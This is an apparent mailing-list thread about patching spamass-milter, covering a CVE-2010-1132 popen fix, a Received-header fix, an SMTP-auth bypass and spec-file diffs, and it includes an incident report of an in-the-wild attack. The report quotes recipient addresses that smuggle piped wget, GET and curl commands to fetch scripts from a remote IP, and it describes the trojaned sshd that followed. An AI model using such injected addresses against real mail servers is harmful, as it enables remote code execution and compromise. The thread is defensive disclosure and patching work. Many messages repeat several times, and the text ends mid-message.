
--- spamass-milter-0.3.1/spamass-milter.cpp.ori 2006-03-23 15:41:36.000000000 -0600
+++ spamass-milter-0.3.1/spamass-milter.cpp 2009-04-20 20:03:31.000000000 -0500
@@ -1002,9 +1002,9 @@

assassin->output((string)
"Received: from "+macro_s+" ("+macro__+")\r\n\t"+
- "by "+macro_j+"("+macro_v+"/"+macro_Z+") with "+macro_r+" id "+macro_i+"\r\n\t"+
+ "by "+macro_j+" ("+macro_v+"/"+macro_Z+") with "+macro_r+" id "+macro_i+";\r\n\t"+
macro_b+"\r\n\t"+
- "(envelope-from "+assassin->from()+"\r\n");
+ "(envelope-from "+assassin->from()+")\r\n");

} else
assassin->output((string)"X-Envelope-To: "+envrcpt[0]+"\r\n");
-------------- next part --------------
A non-text attachment was scrubbed...
Name: spamass-milter-0.3.1-smtp-auth-bypass.patch
Type: text/x-c
Size: 1232 bytes
Desc: not available
Url : http://lists.repoforge.org/pipermail/users/attachments/20100507/6d20bef5/attachment-0003.bin
Steven Haigh
2010-05-07 09:18:42 UTC
Permalink
On Fri, 07 May 2010 10:34:29 +0200, "Yury V. Zaytsev" <yury at shurup.com>
Post by Yury V. Zaytsev
Why everybody gives links to some obscure SRPMs while it's obviously
easier for us to take the patches from the email / mailing list and it
takes the same amount of effort for the poster???
Ok, here is the lot. Please remove the existing smtp auth patch by me as I
created a new one with the same options to make things much more uniform
across this package. I've also edited the changelog and bumped the release
to 3.
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
-------------- next part --------------
--- spamass-milter.spec.orig 2010-03-08 00:02:19.000000000 +1100
+++ spamass-milter.spec 2010-05-07 19:12:53.000000000 +1000
@@ -5,14 +5,16 @@
Summary: Sendmail milter for spamassassin
Name: spamass-milter
Version: 0.3.1
-Release: 2%{?dist}
+Release: 3%{?dist}
License: GPL
Group: System Environment/Daemons
URL: http://savannah.gnu.org/projects/spamass-milt/

Source: http://savannah.nongnu.org/download/spamass-milt/spamass-milter-%{version}.tar.gz

-Patch0: spamass-milter-smtp-auth.patch
+Patch0: spamass-milter-0.3.1-smtp-auth-bypass.patch
+Patch1: spamass-milter-0.3.1-popen.patch
+Patch2: spamass-milter-0.3.1-rcvd.patch

BuildRoot: %{_tmppath}/%{name}-%{version}-%{release}-root

@@ -26,7 +28,9 @@

%prep
%setup -q
-%patch0 -p0 -b .smtpauth
+%patch0 -p1 -b .smtpauth
+%patch1 -p1 -b .popen
+%patch2 -p1 -b .rcvd

%{__cat} <<EOF >spamass-milter.sysconfig
### Override for your different local config
@@ -154,6 +158,10 @@
%{_sbindir}/spamass-milter

%changelog
+* Fri May 07 2010 Steven Haigh <netwiz at crc.id.au> - 0.3.1.3
+- Added patch to fix CVE-2010-1132.
+- Added patch to fix Received-header generation; this adds a space before the "(" between macro_j and macro_v.)
+
* Sun Mar 07 2010 Yury V. Zaytsev <yury at shurup.com> - 0.3.1-2
- Added SMTP AUTH patch by Steven Haigh.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: spamass-milter-0.3.1-popen.patch
Type: text/x-c
Size: 8008 bytes
Desc: not available
Url : http://lists.repoforge.org/pipermail/users/attachments/20100507/6d20bef5/attachment-0004.bin
-------------- next part --------------
The code in spamass-milter.cpp that tries to create a
Sendmail-compatible header is broken and generates a header
that is incorrectly parsed by SpamAssassin.

This is mostly fixed in CVS apart from the space that needs
adding prior to the "(" between macro_j and macro_v.

https://savannah.nongnu.org/bugs/index.php?17178
http://bugs.debian.org/510665
http://bugzilla.redhat.com/496763

--- spamass-milter-0.3.1/spamass-milter.cpp.ori 2006-03-23 15:41:36.000000000 -0600
+++ spamass-milter-0.3.1/spamass-milter.cpp 2009-04-20 20:03:31.000000000 -0500
@@ -1002,9 +1002,9 @@

assassin->output((string)
"Received: from "+macro_s+" ("+macro__+")\r\n\t"+
- "by "+macro_j+"("+macro_v+"/"+macro_Z+") with "+macro_r+" id "+macro_i+"\r\n\t"+
+ "by "+macro_j+" ("+macro_v+"/"+macro_Z+") with "+macro_r+" id "+macro_i+";\r\n\t"+
macro_b+"\r\n\t"+
- "(envelope-from "+assassin->from()+"\r\n");
+ "(envelope-from "+assassin->from()+")\r\n");

} else
assassin->output((string)"X-Envelope-To: "+envrcpt[0]+"\r\n");
-------------- next part --------------
A non-text attachment was scrubbed...
Name: spamass-milter-0.3.1-smtp-auth-bypass.patch
Type: text/x-c
Size: 1232 bytes
Desc: not available
Url : http://lists.repoforge.org/pipermail/users/attachments/20100507/6d20bef5/attachment-0005.bin
Steven Haigh
2010-05-07 09:18:42 UTC
Permalink
On Fri, 07 May 2010 10:34:29 +0200, "Yury V. Zaytsev" <yury at shurup.com>
Post by Yury V. Zaytsev
Why everybody gives links to some obscure SRPMs while it's obviously
easier for us to take the patches from the email / mailing list and it
takes the same amount of effort for the poster???
Ok, here is the lot. Please remove the existing smtp auth patch by me as I
created a new one with the same options to make things much more uniform
across this package. I've also edited the changelog and bumped the release
to 3.
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
-------------- next part --------------
--- spamass-milter.spec.orig 2010-03-08 00:02:19.000000000 +1100
+++ spamass-milter.spec 2010-05-07 19:12:53.000000000 +1000
@@ -5,14 +5,16 @@
Summary: Sendmail milter for spamassassin
Name: spamass-milter
Version: 0.3.1
-Release: 2%{?dist}
+Release: 3%{?dist}
License: GPL
Group: System Environment/Daemons
URL: http://savannah.gnu.org/projects/spamass-milt/

Source: http://savannah.nongnu.org/download/spamass-milt/spamass-milter-%{version}.tar.gz

-Patch0: spamass-milter-smtp-auth.patch
+Patch0: spamass-milter-0.3.1-smtp-auth-bypass.patch
+Patch1: spamass-milter-0.3.1-popen.patch
+Patch2: spamass-milter-0.3.1-rcvd.patch

BuildRoot: %{_tmppath}/%{name}-%{version}-%{release}-root

@@ -26,7 +28,9 @@

%prep
%setup -q
-%patch0 -p0 -b .smtpauth
+%patch0 -p1 -b .smtpauth
+%patch1 -p1 -b .popen
+%patch2 -p1 -b .rcvd

%{__cat} <<EOF >spamass-milter.sysconfig
### Override for your different local config
@@ -154,6 +158,10 @@
%{_sbindir}/spamass-milter

%changelog
+* Fri May 07 2010 Steven Haigh <netwiz at crc.id.au> - 0.3.1.3
+- Added patch to fix CVE-2010-1132.
+- Added patch to fix Received-header generation; this adds a space before the "(" between macro_j and macro_v.)
+
* Sun Mar 07 2010 Yury V. Zaytsev <yury at shurup.com> - 0.3.1-2
- Added SMTP AUTH patch by Steven Haigh.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: spamass-milter-0.3.1-popen.patch
Type: text/x-c
Size: 8008 bytes
Desc: not available
Url : http://lists.repoforge.org/pipermail/users/attachments/20100507/6d20bef5/attachment-0006.bin
-------------- next part --------------
The code in spamass-milter.cpp that tries to create a
Sendmail-compatible header is broken and generates a header
that is incorrectly parsed by SpamAssassin.

This is mostly fixed in CVS apart from the space that needs
adding prior to the "(" between macro_j and macro_v.

https://savannah.nongnu.org/bugs/index.php?17178
http://bugs.debian.org/510665
http://bugzilla.redhat.com/496763

--- spamass-milter-0.3.1/spamass-milter.cpp.ori 2006-03-23 15:41:36.000000000 -0600
+++ spamass-milter-0.3.1/spamass-milter.cpp 2009-04-20 20:03:31.000000000 -0500
@@ -1002,9 +1002,9 @@

assassin->output((string)
"Received: from "+macro_s+" ("+macro__+")\r\n\t"+
- "by "+macro_j+"("+macro_v+"/"+macro_Z+") with "+macro_r+" id "+macro_i+"\r\n\t"+
+ "by "+macro_j+" ("+macro_v+"/"+macro_Z+") with "+macro_r+" id "+macro_i+";\r\n\t"+
macro_b+"\r\n\t"+
- "(envelope-from "+assassin->from()+"\r\n");
+ "(envelope-from "+assassin->from()+")\r\n");

} else
assassin->output((string)"X-Envelope-To: "+envrcpt[0]+"\r\n");
-------------- next part --------------
A non-text attachment was scrubbed...
Name: spamass-milter-0.3.1-smtp-auth-bypass.patch
Type: text/x-c
Size: 1232 bytes
Desc: not available
Url : http://lists.repoforge.org/pipermail/users/attachments/20100507/6d20bef5/attachment-0007.bin
Steven Haigh
2010-05-07 09:18:42 UTC
Permalink
On Fri, 07 May 2010 10:34:29 +0200, "Yury V. Zaytsev" <yury at shurup.com>
Post by Yury V. Zaytsev
Why everybody gives links to some obscure SRPMs while it's obviously
easier for us to take the patches from the email / mailing list and it
takes the same amount of effort for the poster???
Ok, here is the lot. Please remove the existing smtp auth patch by me as I
created a new one with the same options to make things much more uniform
across this package. I've also edited the changelog and bumped the release
to 3.
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
-------------- next part --------------
--- spamass-milter.spec.orig 2010-03-08 00:02:19.000000000 +1100
+++ spamass-milter.spec 2010-05-07 19:12:53.000000000 +1000
@@ -5,14 +5,16 @@
Summary: Sendmail milter for spamassassin
Name: spamass-milter
Version: 0.3.1
-Release: 2%{?dist}
+Release: 3%{?dist}
License: GPL
Group: System Environment/Daemons
URL: http://savannah.gnu.org/projects/spamass-milt/

Source: http://savannah.nongnu.org/download/spamass-milt/spamass-milter-%{version}.tar.gz

-Patch0: spamass-milter-smtp-auth.patch
+Patch0: spamass-milter-0.3.1-smtp-auth-bypass.patch
+Patch1: spamass-milter-0.3.1-popen.patch
+Patch2: spamass-milter-0.3.1-rcvd.patch

BuildRoot: %{_tmppath}/%{name}-%{version}-%{release}-root

@@ -26,7 +28,9 @@

%prep
%setup -q
-%patch0 -p0 -b .smtpauth
+%patch0 -p1 -b .smtpauth
+%patch1 -p1 -b .popen
+%patch2 -p1 -b .rcvd

%{__cat} <<EOF >spamass-milter.sysconfig
### Override for your different local config
@@ -154,6 +158,10 @@
%{_sbindir}/spamass-milter

%changelog
+* Fri May 07 2010 Steven Haigh <netwiz at crc.id.au> - 0.3.1.3
+- Added patch to fix CVE-2010-1132.
+- Added patch to fix Received-header generation; this adds a space before the "(" between macro_j and macro_v.)
+
* Sun Mar 07 2010 Yury V. Zaytsev <yury at shurup.com> - 0.3.1-2
- Added SMTP AUTH patch by Steven Haigh.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: spamass-milter-0.3.1-popen.patch
Type: text/x-c
Size: 8008 bytes
Desc: not available
URL: <http://lists.repoforge.org/pipermail/users/attachments/20100507/6d20bef5/attachment-0008.bin>
-------------- next part --------------
The code in spamass-milter.cpp that tries to create a
Sendmail-compatible header is broken and generates a header
that is incorrectly parsed by SpamAssassin.

This is mostly fixed in CVS apart from the space that needs
adding prior to the "(" between macro_j and macro_v.

https://savannah.nongnu.org/bugs/index.php?17178
http://bugs.debian.org/510665
http://bugzilla.redhat.com/496763

--- spamass-milter-0.3.1/spamass-milter.cpp.ori 2006-03-23 15:41:36.000000000 -0600
+++ spamass-milter-0.3.1/spamass-milter.cpp 2009-04-20 20:03:31.000000000 -0500
@@ -1002,9 +1002,9 @@

assassin->output((string)
"Received: from "+macro_s+" ("+macro__+")\r\n\t"+
- "by "+macro_j+"("+macro_v+"/"+macro_Z+") with "+macro_r+" id "+macro_i+"\r\n\t"+
+ "by "+macro_j+" ("+macro_v+"/"+macro_Z+") with "+macro_r+" id "+macro_i+";\r\n\t"+
macro_b+"\r\n\t"+
- "(envelope-from "+assassin->from()+"\r\n");
+ "(envelope-from "+assassin->from()+")\r\n");

} else
assassin->output((string)"X-Envelope-To: "+envrcpt[0]+"\r\n");
-------------- next part --------------
A non-text attachment was scrubbed...
Name: spamass-milter-0.3.1-smtp-auth-bypass.patch
Type: text/x-c
Size: 1232 bytes
Desc: not available
URL: <http://lists.repoforge.org/pipermail/users/attachments/20100507/6d20bef5/attachment-0009.bin>
Yury V. Zaytsev
2010-05-07 08:34:29 UTC
Permalink
Post by Steven Haigh
I have no idea where the RPMForge CVS trees are - nor do I have anything
configured to do this - I haven't used CVS is nearly 5 years. The patches
were included separately and not in the source tarball to make life easy.
The only changes to the spec was the revision number and the inclusion of
the Patch0/1/2 lines.
We never used cvs and you don't have to set up anything to access it

http://svn.rpmforge.net/svn/trunk/rpms/
Post by Steven Haigh
To revert to the rf standards, it needs one line editing in the spec and a
rebuild. Surely this is easier than making me go back, find the original
spec and do yet another patch that won't get included ;)
The point is that I have to download and unpack the SRPM to fish your
patches out on a system that does not even have rpm installed.

Why everybody gives links to some obscure SRPMs while it's obviously
easier for us to take the patches from the email / mailing list and it
takes the same amount of effort for the poster???
--
Sincerely yours,
Yury V. Zaytsev
Yury V. Zaytsev
2010-05-07 08:34:29 UTC
Permalink
Post by Steven Haigh
I have no idea where the RPMForge CVS trees are - nor do I have anything
configured to do this - I haven't used CVS is nearly 5 years. The patches
were included separately and not in the source tarball to make life easy.
The only changes to the spec was the revision number and the inclusion of
the Patch0/1/2 lines.
We never used cvs and you don't have to set up anything to access it

http://svn.rpmforge.net/svn/trunk/rpms/
Post by Steven Haigh
To revert to the rf standards, it needs one line editing in the spec and a
rebuild. Surely this is easier than making me go back, find the original
spec and do yet another patch that won't get included ;)
The point is that I have to download and unpack the SRPM to fish your
patches out on a system that does not even have rpm installed.

Why everybody gives links to some obscure SRPMs while it's obviously
easier for us to take the patches from the email / mailing list and it
takes the same amount of effort for the poster???
--
Sincerely yours,
Yury V. Zaytsev
Yury V. Zaytsev
2010-05-07 08:34:29 UTC
Permalink
Post by Steven Haigh
I have no idea where the RPMForge CVS trees are - nor do I have anything
configured to do this - I haven't used CVS is nearly 5 years. The patches
were included separately and not in the source tarball to make life easy.
The only changes to the spec was the revision number and the inclusion of
the Patch0/1/2 lines.
We never used cvs and you don't have to set up anything to access it

http://svn.rpmforge.net/svn/trunk/rpms/
Post by Steven Haigh
To revert to the rf standards, it needs one line editing in the spec and a
rebuild. Surely this is easier than making me go back, find the original
spec and do yet another patch that won't get included ;)
The point is that I have to download and unpack the SRPM to fish your
patches out on a system that does not even have rpm installed.

Why everybody gives links to some obscure SRPMs while it's obviously
easier for us to take the patches from the email / mailing list and it
takes the same amount of effort for the poster???
--
Sincerely yours,
Yury V. Zaytsev
Yury V. Zaytsev
2010-05-07 08:34:29 UTC
Permalink
Post by Steven Haigh
I have no idea where the RPMForge CVS trees are - nor do I have anything
configured to do this - I haven't used CVS is nearly 5 years. The patches
were included separately and not in the source tarball to make life easy.
The only changes to the spec was the revision number and the inclusion of
the Patch0/1/2 lines.
We never used cvs and you don't have to set up anything to access it

http://svn.rpmforge.net/svn/trunk/rpms/
Post by Steven Haigh
To revert to the rf standards, it needs one line editing in the spec and a
rebuild. Surely this is easier than making me go back, find the original
spec and do yet another patch that won't get included ;)
The point is that I have to download and unpack the SRPM to fish your
patches out on a system that does not even have rpm installed.

Why everybody gives links to some obscure SRPMs while it's obviously
easier for us to take the patches from the email / mailing list and it
takes the same amount of effort for the poster???
--
Sincerely yours,
Yury V. Zaytsev
Steven Haigh
2010-05-07 08:26:40 UTC
Permalink
On Fri, 07 May 2010 09:07:33 +0200, "Yury V. Zaytsev" <yury at shurup.com>
Post by Yury V. Zaytsev
Post by Steven Haigh
http://www.crc.id.au/downloads/spamass-milter-0.3.1-4.crc.src.rpm
If some people can test it and it works as it should, feel free to retag
it and place it into the repositories.
Could you please just post the diff against the stock SPEC from svn and
the patches that are not in our package yet? I don't have time to
download and unpack third-party SRPMS to take out the patches, compare
the SPECs to see what was changed etc.
I have no idea where the RPMForge CVS trees are - nor do I have anything
configured to do this - I haven't used CVS is nearly 5 years. The patches
were included separately and not in the source tarball to make life easy.
The only changes to the spec was the revision number and the inclusion of
the Patch0/1/2 lines.

To revert to the rf standards, it needs one line editing in the spec and a
rebuild. Surely this is easier than making me go back, find the original
spec and do yet another patch that won't get included ;)
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Steven Haigh
2010-05-07 08:26:40 UTC
Permalink
On Fri, 07 May 2010 09:07:33 +0200, "Yury V. Zaytsev" <yury at shurup.com>
Post by Yury V. Zaytsev
Post by Steven Haigh
http://www.crc.id.au/downloads/spamass-milter-0.3.1-4.crc.src.rpm
If some people can test it and it works as it should, feel free to retag
it and place it into the repositories.
Could you please just post the diff against the stock SPEC from svn and
the patches that are not in our package yet? I don't have time to
download and unpack third-party SRPMS to take out the patches, compare
the SPECs to see what was changed etc.
I have no idea where the RPMForge CVS trees are - nor do I have anything
configured to do this - I haven't used CVS is nearly 5 years. The patches
were included separately and not in the source tarball to make life easy.
The only changes to the spec was the revision number and the inclusion of
the Patch0/1/2 lines.

To revert to the rf standards, it needs one line editing in the spec and a
rebuild. Surely this is easier than making me go back, find the original
spec and do yet another patch that won't get included ;)
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Steven Haigh
2010-05-07 08:26:40 UTC
Permalink
On Fri, 07 May 2010 09:07:33 +0200, "Yury V. Zaytsev" <yury at shurup.com>
Post by Yury V. Zaytsev
Post by Steven Haigh
http://www.crc.id.au/downloads/spamass-milter-0.3.1-4.crc.src.rpm
If some people can test it and it works as it should, feel free to retag
it and place it into the repositories.
Could you please just post the diff against the stock SPEC from svn and
the patches that are not in our package yet? I don't have time to
download and unpack third-party SRPMS to take out the patches, compare
the SPECs to see what was changed etc.
I have no idea where the RPMForge CVS trees are - nor do I have anything
configured to do this - I haven't used CVS is nearly 5 years. The patches
were included separately and not in the source tarball to make life easy.
The only changes to the spec was the revision number and the inclusion of
the Patch0/1/2 lines.

To revert to the rf standards, it needs one line editing in the spec and a
rebuild. Surely this is easier than making me go back, find the original
spec and do yet another patch that won't get included ;)
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Steven Haigh
2010-05-07 08:26:40 UTC
Permalink
On Fri, 07 May 2010 09:07:33 +0200, "Yury V. Zaytsev" <yury at shurup.com>
Post by Yury V. Zaytsev
Post by Steven Haigh
http://www.crc.id.au/downloads/spamass-milter-0.3.1-4.crc.src.rpm
If some people can test it and it works as it should, feel free to retag
it and place it into the repositories.
Could you please just post the diff against the stock SPEC from svn and
the patches that are not in our package yet? I don't have time to
download and unpack third-party SRPMS to take out the patches, compare
the SPECs to see what was changed etc.
I have no idea where the RPMForge CVS trees are - nor do I have anything
configured to do this - I haven't used CVS is nearly 5 years. The patches
were included separately and not in the source tarball to make life easy.
The only changes to the spec was the revision number and the inclusion of
the Patch0/1/2 lines.

To revert to the rf standards, it needs one line editing in the spec and a
rebuild. Surely this is easier than making me go back, find the original
spec and do yet another patch that won't get included ;)
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Yury V. Zaytsev
2010-05-07 07:07:33 UTC
Permalink
Post by Steven Haigh
http://www.crc.id.au/downloads/spamass-milter-0.3.1-4.crc.src.rpm
If some people can test it and it works as it should, feel free to retag
it and place it into the repositories.
Could you please just post the diff against the stock SPEC from svn and
the patches that are not in our package yet? I don't have time to
download and unpack third-party SRPMS to take out the patches, compare
the SPECs to see what was changed etc.
--
Sincerely yours,
Yury V. Zaytsev
Yury V. Zaytsev
2010-05-07 07:07:33 UTC
Permalink
Post by Steven Haigh
http://www.crc.id.au/downloads/spamass-milter-0.3.1-4.crc.src.rpm
If some people can test it and it works as it should, feel free to retag
it and place it into the repositories.
Could you please just post the diff against the stock SPEC from svn and
the patches that are not in our package yet? I don't have time to
download and unpack third-party SRPMS to take out the patches, compare
the SPECs to see what was changed etc.
--
Sincerely yours,
Yury V. Zaytsev
Yury V. Zaytsev
2010-05-07 07:07:33 UTC
Permalink
Post by Steven Haigh
http://www.crc.id.au/downloads/spamass-milter-0.3.1-4.crc.src.rpm
If some people can test it and it works as it should, feel free to retag
it and place it into the repositories.
Could you please just post the diff against the stock SPEC from svn and
the patches that are not in our package yet? I don't have time to
download and unpack third-party SRPMS to take out the patches, compare
the SPECs to see what was changed etc.
--
Sincerely yours,
Yury V. Zaytsev
Yury V. Zaytsev
2010-05-07 07:07:33 UTC
Permalink
Post by Steven Haigh
http://www.crc.id.au/downloads/spamass-milter-0.3.1-4.crc.src.rpm
If some people can test it and it works as it should, feel free to retag
it and place it into the repositories.
Could you please just post the diff against the stock SPEC from svn and
the patches that are not in our package yet? I don't have time to
download and unpack third-party SRPMS to take out the patches, compare
the SPECs to see what was changed etc.
--
Sincerely yours,
Yury V. Zaytsev
Steven Haigh
2010-05-07 04:07:22 UTC
Permalink
I believe I have created a properly patched SRPM to replace the one on RF
with that should fix all outstanding issues.

Its my first go at making a srpm but it compiles and runs ok on my side.

It has 3 patches included:
spamass-milter-0.3.1-popen.patch - Fixes this vulnerability.
spamass-milter-0.3.1-rcvd.patch - Fixes a minor issue with Received
headers
spamass-milter-0.3.1-smtp-auth-bypass.patch - Bypasses scanning for email
sent with SMTP auth.

You can find it at:
http://www.crc.id.au/downloads/spamass-milter-0.3.1-4.crc.src.rpm

If some people can test it and it works as it should, feel free to retag
it and place it into the repositories.

On Wed, 17 Mar 2010 09:42:03 +0100, "Yury V. Zaytsev" <yury at shurup.com>
Post by Yury V. Zaytsev
Hi!
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
I'm still unsure where the problem lies, but here's what I know.
Thanks for letting us know!
spamass-milter in the default RPMForge configuration does not run with
-x (I'm not even sure what's the practical use of it), so it's not
vulnerable.
However I will be happy to include the patch that upstream is cooking
http://savannah.nongnu.org/bugs/index.php?29136
I don't have time to track this page and also do not have Savannah
account to subscribe to the bug updates, so it would be nice if somebody
could post to the list when they are done with it.
Thanks!
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Steven Haigh
2010-05-07 04:07:22 UTC
Permalink
I believe I have created a properly patched SRPM to replace the one on RF
with that should fix all outstanding issues.

Its my first go at making a srpm but it compiles and runs ok on my side.

It has 3 patches included:
spamass-milter-0.3.1-popen.patch - Fixes this vulnerability.
spamass-milter-0.3.1-rcvd.patch - Fixes a minor issue with Received
headers
spamass-milter-0.3.1-smtp-auth-bypass.patch - Bypasses scanning for email
sent with SMTP auth.

You can find it at:
http://www.crc.id.au/downloads/spamass-milter-0.3.1-4.crc.src.rpm

If some people can test it and it works as it should, feel free to retag
it and place it into the repositories.

On Wed, 17 Mar 2010 09:42:03 +0100, "Yury V. Zaytsev" <yury at shurup.com>
Post by Yury V. Zaytsev
Hi!
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
I'm still unsure where the problem lies, but here's what I know.
Thanks for letting us know!
spamass-milter in the default RPMForge configuration does not run with
-x (I'm not even sure what's the practical use of it), so it's not
vulnerable.
However I will be happy to include the patch that upstream is cooking
http://savannah.nongnu.org/bugs/index.php?29136
I don't have time to track this page and also do not have Savannah
account to subscribe to the bug updates, so it would be nice if somebody
could post to the list when they are done with it.
Thanks!
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Steven Haigh
2010-05-07 04:07:22 UTC
Permalink
I believe I have created a properly patched SRPM to replace the one on RF
with that should fix all outstanding issues.

Its my first go at making a srpm but it compiles and runs ok on my side.

It has 3 patches included:
spamass-milter-0.3.1-popen.patch - Fixes this vulnerability.
spamass-milter-0.3.1-rcvd.patch - Fixes a minor issue with Received
headers
spamass-milter-0.3.1-smtp-auth-bypass.patch - Bypasses scanning for email
sent with SMTP auth.

You can find it at:
http://www.crc.id.au/downloads/spamass-milter-0.3.1-4.crc.src.rpm

If some people can test it and it works as it should, feel free to retag
it and place it into the repositories.

On Wed, 17 Mar 2010 09:42:03 +0100, "Yury V. Zaytsev" <yury at shurup.com>
Post by Yury V. Zaytsev
Hi!
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
I'm still unsure where the problem lies, but here's what I know.
Thanks for letting us know!
spamass-milter in the default RPMForge configuration does not run with
-x (I'm not even sure what's the practical use of it), so it's not
vulnerable.
However I will be happy to include the patch that upstream is cooking
http://savannah.nongnu.org/bugs/index.php?29136
I don't have time to track this page and also do not have Savannah
account to subscribe to the bug updates, so it would be nice if somebody
could post to the list when they are done with it.
Thanks!
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Steven Haigh
2010-05-07 04:07:22 UTC
Permalink
I believe I have created a properly patched SRPM to replace the one on RF
with that should fix all outstanding issues.

Its my first go at making a srpm but it compiles and runs ok on my side.

It has 3 patches included:
spamass-milter-0.3.1-popen.patch - Fixes this vulnerability.
spamass-milter-0.3.1-rcvd.patch - Fixes a minor issue with Received
headers
spamass-milter-0.3.1-smtp-auth-bypass.patch - Bypasses scanning for email
sent with SMTP auth.

You can find it at:
http://www.crc.id.au/downloads/spamass-milter-0.3.1-4.crc.src.rpm

If some people can test it and it works as it should, feel free to retag
it and place it into the repositories.

On Wed, 17 Mar 2010 09:42:03 +0100, "Yury V. Zaytsev" <yury at shurup.com>
Post by Yury V. Zaytsev
Hi!
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
I'm still unsure where the problem lies, but here's what I know.
Thanks for letting us know!
spamass-milter in the default RPMForge configuration does not run with
-x (I'm not even sure what's the practical use of it), so it's not
vulnerable.
However I will be happy to include the patch that upstream is cooking
http://savannah.nongnu.org/bugs/index.php?29136
I don't have time to track this page and also do not have Savannah
account to subscribe to the bug updates, so it would be nice if somebody
could post to the list when they are done with it.
Thanks!
--
Steven Haigh

Email: netwiz at crc.id.au
Web: http://www.crc.id.au
Phone: (03) 9001 6090 - 0412 935 897
Fax: (03) 8338 0299
Paul Heinlein
2010-03-16 19:08:17 UTC
Permalink
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
I'm still unsure where the problem lies, but here's what I know.

The system described below runs x86_64 release of CentOS 5.4. SELinux
was, at the time, in Permissive mode. The packages involved, as far as
I can tell, are

* spamassassin-3.2.5-1.el5.rf
* spamass-milter-0.3.1-1.el5.rf
* sendmail-8.13.8-2.el5 (not rpmforge, obviously)

Mar 15 05:47 (times are PDT): Several messages arrived with suspicious
recipients:

<root+:>
<root+:"|wget http://61.100.185.177/busy-1.php">
<root+:"|GET http://61.100.185.177/busy-2.php">
<root+:"|curl http://61.100.185.177/busy-3.php">

Sendmail recognized the addresses as syntactically evil, but a process
running under the spamass_milter_t context ran wget, GET, and curl and
connected to the IP address in the addresses above.

The file(s) downloaded by these processes executed a shell script. It
did several things, the highlights of which are

1. It downloaded, uncompressed, and untar-ed a file named
xS.tar.gz. The resulting directory name was /xS.

2. It tried to add a unix group and user named "sshd"; the attempt
failed, probably because there's already an sshd user and group
on the system.

3. It installed 32-bit Linux executables in place of /usr/bin/ssh
and /usr/sbin/sshd. The new executables were dynamically linked
against a small number of libraries, but most of the supporting
libraries had been compiled directly into the applications.

4. It installed a minimal /etc/ssh/sshd_config and an empty
/etc/ssh/ssh_config.

5. After verifying that sshd was in the process table, it
removed the /xS directory.

6. It created an empty file name /dev/devno

7. It restarted sshd using /sbin/service

Again, this was all done under the spamass_milter_t security context.

I don't know enough about the sendmail <-> spamass-milter <-> spamd
pipeline to have a definitive idea about what application misparsed
the piped e-mail addresses and executed them.

I saw the attack again this morning, but by then I'd cleaned things up
and gotten SELinux back into Enforcing mode, which prevented the
exploit from working again.
--
Paul Heinlein <> heinlein at madboa.com <> http://www.madboa.com/
Paul Heinlein
2010-03-16 21:19:25 UTC
Permalink
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
Belatedly, I found a notice:

http://seclists.org/fulldisclosure/2010/Mar/267

And some exploit code:

http://seclists.org/fulldisclosure/2010/Mar/att-264/adv.txt
--
Paul Heinlein <> heinlein at madboa.com <> http://www.madboa.com/
Yury V. Zaytsev
2010-03-17 08:42:03 UTC
Permalink
Hi!
Post by Paul Heinlein
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
I'm still unsure where the problem lies, but here's what I know.
Thanks for letting us know!

spamass-milter in the default RPMForge configuration does not run with
-x (I'm not even sure what's the practical use of it), so it's not
vulnerable.

However I will be happy to include the patch that upstream is cooking
when it's ready:

http://savannah.nongnu.org/bugs/index.php?29136

I don't have time to track this page and also do not have Savannah
account to subscribe to the bug updates, so it would be nice if somebody
could post to the list when they are done with it.

Thanks!
--
Sincerely yours,
Yury V. Zaytsev
Paul Heinlein
2010-03-16 19:08:17 UTC
Permalink
This is a heads-up that there might be an actively exploited
vulnerability in either the spamassassin or spamass-milter package.
I'm still unsure where the problem lies, but here's what I know.

The system described below runs x86_64 release of CentOS 5.4. SELinux
was, at the time, in Permissive mode. The packages involved, as far as
I can tell, are

* spamassassin-3.2.5-1.el5.rf
* spamass-milter-0.3.1-1.el5.rf
* sendmail-8.13.8-2.el5 (not rpmforge, obviously)

Mar 15 05:47 (times are PDT): Several messages arrived with suspicious
recipients:

<root+:>
<root+:"|wget http://61.100.185.177/busy-1.php">
<root+:"|GET http://61.100.185.177/busy-2.php">
<root+:"|curl http://61.100.185.177/busy-3.php">

Sendmail recognized the addresses as syntactically evil, but a process
running under the spamass_milter_t context ran wget, GET, and curl and
connected to the IP address in the addresses above.

The file(s) downloaded by these processes executed a shell script. It
